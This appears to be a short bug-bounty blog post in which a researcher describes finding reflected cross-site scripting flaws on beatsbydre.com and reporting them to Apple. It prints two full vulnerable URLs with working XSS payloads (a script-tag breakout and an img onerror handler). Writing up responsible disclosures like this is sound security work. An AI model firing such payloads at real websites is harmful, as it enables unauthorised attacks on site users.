In 2014 Apple Acquired Beats. Just after acquisition I thought of testing it. So I ended up finding multiple XSS in their main domain http://beatsbydre.com.
So what was next?? other than reporting the Bug
Vulnerable Links were like below
http://www.beatsbydre.com/ earphones/tour/red/900-00101- 01.html?maxLimitError=--></
SCRIPT>">'><SCRIPT>prompt( String.fromCharCode(34,
120, 115, 115, 32, 98, 121, 32, 77, 117, 104, 97, 109, 109, 97, 100,
32, 32, 65, 98, 100, 117, 108, 108, 97, 104, 34))</SCRIPT>
http://www.beatsbydre.com/ headphones/mixr/beats-mixr. html?bvrrp=9218-en_us/reviews/ product/5/beats-mixr.htm&icid= "><img src=1 onerror=prompt(document. domain);>//
So what was next?? other than reporting the Bug
Vulnerable Links were like below
http://www.beatsbydre.com/
http://www.beatsbydre.com/
Simple Vectors were used...
At First Apple refused to address the Vulnerability
But later on they accepted the report.
As per Apple's Policy Only HOF was offered as a reward..
Muhammad Abdullah
No comments:
Post a Comment